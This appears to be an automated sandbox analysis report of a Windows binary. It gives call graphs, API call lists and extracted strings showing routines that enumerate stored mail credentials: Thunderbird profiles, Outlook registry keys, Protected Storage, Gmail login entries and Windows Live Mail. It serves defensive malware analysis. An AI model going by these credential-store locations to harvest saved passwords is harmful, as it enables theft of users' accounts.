33914->33920 33921 40f715 33915->33921 33916 404656 FreeLibrary 33917 40f7f1 33916->33917 33918 404785 FreeLibrary 33917->33918 33919 40f7fc 33918->33919 33919->33801 33920->33916 33921->33920 33922 40f797 WideCharToMultiByte 33921->33922 33923 40f7b8 strlen 33922->33923 33924 40f7d9 LocalFree 33922->33924 33923->33924 33925 40f7c8 _mbscpy 33923->33925 33924->33920 33925->33924 33926->33801 33927->33801 33928->33912 33930 44458b 33929->33930 33931 40381a 33930->33931 33939 410add RegQueryValueExA 33930->33939 33931->33809 33937 4021b6 memset 33931->33937 33933 4445a4 33933->33931 33940 410add RegQueryValueExA 33933->33940 33935 4445c1 33935->33931 33941 444879 30 API calls 33935->33941 33937->33811 33938->33809 33939->33933 33940->33935 33941->33931 33942->33828 33944 4075c9 33943->33944 33945 4075bb _mbscat 33943->33945 33946 444212 33944->33946 33945->33944 33963 407e9d 33946->33963 33949 44424d 33950 444274 33949->33950 33951 444258 33949->33951 33971 407ef8 33949->33971 33952 407e9d 9 API calls 33950->33952 33988 444196 51 API calls 33951->33988 33959 4442a0 33952->33959 33954 407ef8 9 API calls 33954->33959 33955 4442ce 33985 407f90 33955->33985 33959->33954 33959->33955 33961 444212 64 API calls 33959->33961 33981 407e62 33959->33981 33960 407f90 FindClose 33962 4442e4 33960->33962 33961->33959 33962->33850 33964 407f90 FindClose 33963->33964 33965 407eaa 33964->33965 33966 406f06 2 API calls 33965->33966 33967 407ebd strlen strlen 33966->33967 33968 407ee1 33967->33968 33969 407eea 33967->33969 33989 4070e3 strlen _mbscat _mbscpy _mbscat 33968->33989 33969->33949 33972 407f03 FindFirstFileA 33971->33972 33973 407f24 FindNextFileA 33971->33973 33974 407f3f 33972->33974 33975 407f46 strlen strlen 33973->33975 33976 407f3a 33973->33976 33974->33975 33978 407f7f 33974->33978 33975->33978 33979 407f76 33975->33979 33977 407f90 FindClose 33976->33977 33977->33974 33978->33949 33990 4070e3 strlen _mbscat _mbscpy _mbscat 33979->33990 33982 407e94 33981->33982 33983 407e6c strcmp 33981->33983 33982->33959 33983->33982 33984 407e83 strcmp 33983->33984 33984->33982 33986 407fa3 33985->33986 33987 407f99 FindClose 33985->33987 33986->33960 33987->33986 33988->33949 33989->33969 33990->33978 33991->33504 33992->33508 33993->33514 33994->33515 33995->33521 33996->33518 33997->33513 34015 411853 RtlInitializeCriticalSection memset 34016 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34191 40a256 13 API calls 34193 432e5b 17 API calls 34195 43fa5a 20 API calls 34018 401060 41 API calls 34198 427260 CloseHandle memset memset 34022 410c68 FindResourceA SizeofResource LoadResource LockResource 34200 405e69 14 API calls 34024 433068 15 API calls __fprintf_l 34202 414a6d 18 API calls 34203 43fe6f 134 API calls 34026 424c6d 15 API calls __fprintf_l 34204 426741 19 API calls 34028 440c70 17 API calls 34029 443c71 42 API calls 34032 427c79 24 API calls 34207 416e7e memset __fprintf_l 34036 42800b 47 API calls 34037 425115 85 API calls __fprintf_l 34210 41960c 61 API calls 34038 43f40c 122 API calls __fprintf_l 34041 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34042 43f81a 20 API calls 34044 414c20 memset memset 34045 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34214 414625 18 API calls 34215 404225 modf 34216 403a26 strlen WriteFile 34218 40422a 12 API calls 34222 427632 memset memset memcpy 34223 40ca30 59 API calls 34224 404235 26 API calls 34046 42ec34 61 API calls __fprintf_l 34047 425115 76 API calls __fprintf_l 34225 425115 77 API calls __fprintf_l 34227 44223a 38 API calls 34053 43183c 112 API calls 34228 44b2c5 _onexit __dllonexit 34233 42a6d2 memcpy __allrem 34055 405cda 60 API calls 34241 43fedc 138 API calls 34242 4116e1 16 API calls __fprintf_l 34058 4244e6 19 API calls 34060 42e8e8 127 API calls __fprintf_l 34061 4118ee RtlLeaveCriticalSection 34247 43f6ec 22 API calls 34063 425115 119 API calls __fprintf_l 34064 410cf3 EnumResourceNamesA 34250 4492f0 memcpy memcpy 34252 43fafa 18 API calls 34254 4342f9 15 API calls __fprintf_l 34065 4144fd 19 API calls 34256 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34257 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34260 443a84 _mbscpy 34262 43f681 17 API calls 34068 404487 22 API calls 34264 415e8c 16 API calls __fprintf_l 34072 411893 RtlDeleteCriticalSection __fprintf_l 34073 41a492 42 API calls 34268 403e96 34 API calls 34269 410e98 memset SHGetPathFromIDList SendMessageA 34075 426741 109 API calls __fprintf_l 34076 4344a2 18 API calls 34077 4094a2 10 API calls 34272 4116a6 15 API calls __fprintf_l 34273 43f6a4 17 API calls 34274 440aa3 20 API calls 34276 427430 45 API calls 34080 4090b0 7 API calls 34081 4148b0 15 API calls 34083 4118b4 RtlEnterCriticalSection 34084 4014b7 CreateWindowExA 34085 40c8b8 19 API calls 34087 4118bf RtlTryEnterCriticalSection 34281 42434a 18 API calls __fprintf_l 34283 405f53 12 API calls 34095 43f956 59 API calls 34097 40955a 17 API calls 34098 428561 36 API calls 34099 409164 7 API calls 34287 404366 19 API calls 34291 40176c ExitProcess 34294 410777 42 API calls 34104 40dd7b 51 API calls 34105 425d7c 16 API calls __fprintf_l 34296 43f6f0 25 API calls 34297 42db01 22 API calls 34106 412905 15 API calls __fprintf_l 34298 403b04 54 API calls 34299 405f04 SetDlgItemTextA GetDlgItemTextA 34300 44b301 ??3@YAXPAX 34303 4120ea 14 API calls 3 library calls 34304 40bb0a 8 API calls 34306 413f11 strcmp 34110 434110 17 API calls __fprintf_l 34113 425115 108 API calls __fprintf_l 34307 444b11 _onexit 34115 425115 76 API calls __fprintf_l 34118 429d19 10 API calls 34310 444b1f __dllonexit 34311 409f20 _strcmpi 34120 42b927 31 API calls 34314 433f26 19 API calls __fprintf_l 34315 44b323 FreeLibrary 34316 427f25 46 API calls 34317 43ff2b 17 API calls 34318 43fb30 19 API calls 34127 414d36 16 API calls 34129 40ad38 7 API calls 34320 433b38 16 API calls __fprintf_l 33998 44b33b 33999 44b344 ??3@YAXPAX 33998->33999 34000 44b34b 33998->34000 33999->34000 34001 44b354 ??3@YAXPAX 34000->34001 34002 44b35b 34000->34002 34001->34002 34003 44b364 ??3@YAXPAX 34002->34003 34004 44b36b 34002->34004 34003->34004 34005 44b374 ??3@YAXPAX 34004->34005 34006 44b37b 34004->34006 34005->34006 34133 426741 21 API calls 34134 40c5c3 123 API calls 34136 43fdc5 17 API calls 34321 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34139 4161cb memcpy memcpy memcpy memcpy 34326 43ffc8 18 API calls 34140 4281cc 15 API calls __fprintf_l 34328 4383cc 110 API calls __fprintf_l 34141 4275d3 41 API calls 34329 4153d3 22 API calls __fprintf_l 34142 444dd7 _XcptFilter 34334 4013de 15 API calls 34336 425115 111 API calls __fprintf_l 34337 43f7db 18 API calls 34340 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34144 4335ee 16 API calls __fprintf_l 34342 429fef 11 API calls 34145 444deb _exit _c_exit 34343 40bbf0 133 API calls 34148 425115 79 API calls __fprintf_l 34347 437ffa 22 API calls 34152 4021ff 14 API calls 34153 43f5fc 149 API calls 34348 40e381 9 API calls 34155 405983 40 API calls 34156 42b186 27 API calls __fprintf_l 34157 427d86 76 API calls 34158 403585 20 API calls 34160 42e58e 18 API calls __fprintf_l 34163 425115 75 API calls __fprintf_l 34165 401592 8 API calls 33201 410b92 33204 410a6b 33201->33204 33203 410bb2 33205 410a77 33204->33205 33206 410a89 GetPrivateProfileIntA 33204->33206 33209 410983 memset _itoa WritePrivateProfileStringA 33205->33209 33206->33203 33208 410a84 33208->33203 33209->33208 34352 434395 16 API calls 34167 441d9c memcmp 34354 43f79b 119 API calls 34168 40c599 42 API calls 34355 426741 87 API calls 34172 4401a6 21 API calls 34174 426da6 memcpy memset memset memcpy 34175 4335a5 15 API calls 34177 4299ab memset memset memcpy memset memset 34178 40b1ab 8 API calls 34360 425115 76 API calls __fprintf_l 34364 4113b2 18 API calls 2 library calls 34368 40a3b8 memset sprintf SendMessageA 33210 410bbc 33213 4109cf 33210->33213 33214 4109dc 33213->33214 33215 410a23 memset GetPrivateProfileStringA 33214->33215 33216 4109ea memset 33214->33216 33221 407646 strlen 33215->33221 33226 4075cd sprintf memcpy 33216->33226 33219 410a65 33220 410a0c WritePrivateProfileStringA 33220->33219 33222 40765a 33221->33222 33224 40765c 33221->33224 33222->33219 33223 4076a3 33223->33219 33224->33223 33227 40737c strtoul 33224->33227 33226->33220 33227->33224 34180 40b5bf memset memset _mbsicmp

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 132 408484-408488 130->132 133 408455-40845e 130->133 134 408422-40842b 131->134 135 408460-408464 133->135 136 408465-408482 133->136 137 408432-40844e 134->137 138 40842d-408431 134->138 135->136 136->132 136->133 137->130 137->134 138->137
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040832F
                                                                                          • memset.MSVCRT ref: 00408343
                                                                                          • memset.MSVCRT ref: 0040835F
                                                                                          • memset.MSVCRT ref: 00408376
                                                                                          • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                          • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                          • strlen.MSVCRT ref: 004083E9
                                                                                          • strlen.MSVCRT ref: 004083F8
                                                                                          • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                          • String ID: 5$H$O$b$i$}$}
                                                                                          • API String ID: 1832431107-3760989150
                                                                                          • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                          • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                          • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                          • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 346 407f86-407f88 343->346 344->346 346->342
                                                                                          APIs
                                                                                          • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                          • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                          • strlen.MSVCRT ref: 00407F5C
                                                                                          • strlen.MSVCRT ref: 00407F64
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFindstrlen$FirstNext
                                                                                          • String ID: ACD
                                                                                          • API String ID: 379999529-620537770
                                                                                          • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                          • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                          • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                          • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00401E8B
                                                                                          • strlen.MSVCRT ref: 00401EA4
                                                                                          • strlen.MSVCRT ref: 00401EB2
                                                                                          • strlen.MSVCRT ref: 00401EF8
                                                                                          • strlen.MSVCRT ref: 00401F06
                                                                                          • memset.MSVCRT ref: 00401FB1
                                                                                          • atoi.MSVCRT(?), ref: 00401FE0
                                                                                          • memset.MSVCRT ref: 00402003
                                                                                          • sprintf.MSVCRT ref: 00402030
                                                                                          • memset.MSVCRT ref: 00402086
                                                                                          • memset.MSVCRT ref: 0040209B
                                                                                          • strlen.MSVCRT ref: 004020A1
                                                                                          • strlen.MSVCRT ref: 004020AF
                                                                                          • strlen.MSVCRT ref: 004020E2
                                                                                          • strlen.MSVCRT ref: 004020F0
                                                                                          • memset.MSVCRT ref: 00402018
                                                                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                          • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                          • API String ID: 3833278029-4223776976
                                                                                          • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                          • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                          • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                          • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                            • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                            • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                            • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                          • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                          • API String ID: 745651260-375988210
                                                                                          • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                          • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                          • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                          • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                          • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                          • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                          Strings
                                                                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                          • PStoreCreateInstance, xrefs: 00403C44
                                                                                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                          • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                          • pstorec.dll, xrefs: 00403C30
                                                                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                          • API String ID: 1197458902-317895162
                                                                                          • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                          • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                          • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                          • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 239 444c80-444c85 236->239 240 444c9f-444ca3 236->240 245 444d02-444d0d __setusermatherr 237->245 246 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->246 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 244 444cad-444cb0 241->244 243->234 247 444c95-444c9d 243->247 244->237 245->246 250 444da4-444da7 246->250 251 444d6a-444d72 246->251 247->244 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                          • String ID: k{v
                                                                                          • API String ID: 3662548030-443568515
                                                                                          • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                          • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                          • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                          • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0044430B
                                                                                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                            • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                            • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                            • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                          • memset.MSVCRT ref: 00444379
                                                                                          • memset.MSVCRT ref: 00444394
                                                                                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                          • strlen.MSVCRT ref: 004443DB
                                                                                          • _strcmpi.MSVCRT ref: 00444401
                                                                                          Strings
                                                                                          • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                          • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                          • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                          • Store Root, xrefs: 004443A5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                          • API String ID: 3203569119-2578778931
                                                                                          • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                          • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                          • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                          • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                          • String ID:
                                                                                          • API String ID: 2054149589-0
                                                                                          • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                          • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                          • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                          • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 320 40ba74 314->320 321 40ba6f-40ba72 314->321 315->308 315->309 317 40baa0-40bab3 call 407e30 324 40bab5-40bac1 317->324 325 40bafa-40bb09 SetCursor 317->325 323 40ba75-40ba76 call 40b5e5 320->323 321->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->317 332->317 333->317 334->317
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Cursor_mbsicmpqsort
                                                                                          • String ID: /nosort$/sort
                                                                                          • API String ID: 882979914-1578091866
                                                                                          • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                          • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                          • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                          • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 348 4085d2-408605 call 44b090 call 4082cd call 410a9c 355 4086d8-4086dd 348->355 356 40860b-40863d memset call 410b62 348->356 359 4086c7-4086cc 356->359 360 408642-40865a call 410a9c 359->360 361 4086d2 359->361 364 4086b1-4086c2 call 410b62 360->364 365 40865c-4086ab memset call 410add call 40848b 360->365 361->355 364->359 365->364
                                                                                          APIs
                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                            • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                            • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                          • memset.MSVCRT ref: 00408620
                                                                                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                          • memset.MSVCRT ref: 00408671
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
